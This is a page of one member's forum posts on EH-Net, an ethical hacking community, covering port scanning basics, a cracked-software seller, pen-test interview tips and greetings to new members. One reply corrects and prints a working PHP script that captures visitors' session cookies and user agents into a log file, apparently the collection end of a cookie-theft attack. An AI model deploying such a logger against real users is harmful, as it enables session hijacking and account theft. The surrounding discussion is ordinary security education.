|
EH-Net
|
|
May 19, 2013, 11:29:03 PM
|
Show Posts
|
|
Pages: 1 ... 3 4 [5] 6 7 ... 126
|
|
61
|
Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: So you scanned a host, and found open ports!!
|
on: June 03, 2012, 07:45:36 PM
|
question to number 1. Maybe yes, maybe no. It just means that when you sent a syn to the port, it responded.
number 2, even after you disconnect from FTP, if you did another scan, the port will still be open, it is only your session that closed.
An open port means means that the service is listening. Which is really just a fancy way of saying the service is running / turned on. If it is closed then the service is turned of.
Not trying to sound condescending, but think of services like porch lights on Halloween. Where I live that means that the person that lives there is giving out candy. If you knock on the door, which the person is listening at, he opens you authenticate by saying trick or treat, and he gives you a bit of candy.
If the light is off, all the knocking in the world won't open the door if the person is not.
That is a beautiful analogy :-) Thanks!
|
|
|
|
|
62
|
Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: So you scanned a host, and found open ports!!
|
on: May 26, 2012, 07:55:33 AM
|
|
1. Just because the port says 'open' doesn't mean a firewall isn't present. A firewall is likely configured with a rule to allow traffic on that port. So, if by definition a firewall controls the flow of network traffic, it may very well be there and doing it's job but it's not "protecting" that port if it's allowing traffic to pass. Assuming you mean protecting as in blocking, in which case the port would be closed and traffic would not be allowed through.
Hopefully I understood what you were asking there.
2. Your FTP port will appear open until you stop the service. If you stop the service, and FTP is no longer running, then the service won't be listening and the port will be closed. You also won't be able to connect using your FTP client or upload files. You would need to start the service again, thus opening the port back up. Ports don't open and close dynamically with a session like you've described - unless maybe you're doing some weird port knocking stuff.
|
|
|
|
|
64
|
Resources / Tools / Re: Core Impact 10 FOR FREE
|
on: May 22, 2012, 10:16:20 AM
|
|
Aside from what this site is about, why would someone want to pay you for software that is two major revisions behind? That's like saying, "hey, I wrote this new exploit for ms03_026 and I'll sell it to you for $5"
Not to mention, there have been other cracks around for other older versions of core impact as well. And I'm pretty sure Core probably watches this site, so they're likely to check into your activities too.
|
|
|
|
|
67
|
Resources / Career Central / Re: Pen Test Interview Soon
|
on: April 25, 2012, 03:01:43 PM
|
Were you told to bring your own system to attack from or will that be provided for you? Certainly, in addition to the technical skills, they will want to see how well you can report on it. I would recommend reading this blog post: http://pen-testing.sans.org/blog/2012/02/09/maximizing-value-in-pen-testingI would want to see that you can summarize the findings in a non-technical summary and that you can present the risk appropriately. I would want to see what your thought process is on how you rate risks - in other words, for this purpose, I wouldn't care what you rated findings so long as you provided thoughtful support. I would also be looking at how you tell me to fix the problem.
|
|
|
|
|
68
|
Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: problem on installing metasploit
|
on: April 20, 2012, 10:04:43 AM
|
|
Well, considering metasploit doesn't officially support iPhone deployments, I think you're going to have to search around to figure it out. Where did you get the package that was installed?
Personally, I had it installed on an older iOS on my iPhone but didn't bother with it later on due to keyboard limitations. You're also likely to have problems with some of the SET features without a mail server.
On a side note, nice F-18 picture, ambient. My brother-in-law is a F-15E pilot.
|
|
|
|
|
69
|
Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: php script is not getting session cookie...
|
on: April 13, 2012, 01:59:49 PM
|
Well, for one, you likely need 'session_start();' at the top of your script to even have a PHP session. Second, use the $_COOKIE variable to grab the session identifier if that's what you're after. I commented out your header redirect and cookie portions, rewrote with the above and echoed the session id (and your log.txt still works and writes the session ID in there). <?php session_start(); //header('Location: http://vulnerableserver.com/index.php?user1'); //$cookie = INI_Get('session.cookie_httponly'); $cookie = $_COOKIE['PHPSESSID']; $date = date ("l ds of F Y h:i:s A"); $user_agent = $_SERVER['HTTP_USER_AGENT']; $file = fopen('log.txt', 'a'); fwrite($file, "DATE : $date || USER AGENT : $user_agent || COOKIE : $cookie \n"); fclose($file); echo $cookie; ?>
|
|
|
|
|
71
|
EH-Net / Greetings / Re: Another new guy
|
on: April 03, 2012, 07:23:10 AM
|
|
You should have access to various DoD-related training material. If you're current position qualifies or considers you as IA then there are different things out there. You may want to look into the CERT VTE as well. Lots of good training there that may be free for you (CISSP, SSCP, Sec+, Net+, CEH and a whole host of others).
|
|
|
|
|
73
|
EH-Net / Greetings / Re: Another new guy
|
on: April 01, 2012, 08:01:34 PM
|
|
As I'm sure you expect, having lingered around for a while, we're all anxious to welcome you to the community.
Sounds like you're well on your way and starting down a path. Do you currently work in IT or is this just a hobby/interest of yours that you'd like to eventually make a career?
Feel free to shout with any questions. All sorts of people willing to help out here.
Bill
|
|
|
|
|
Loading...
|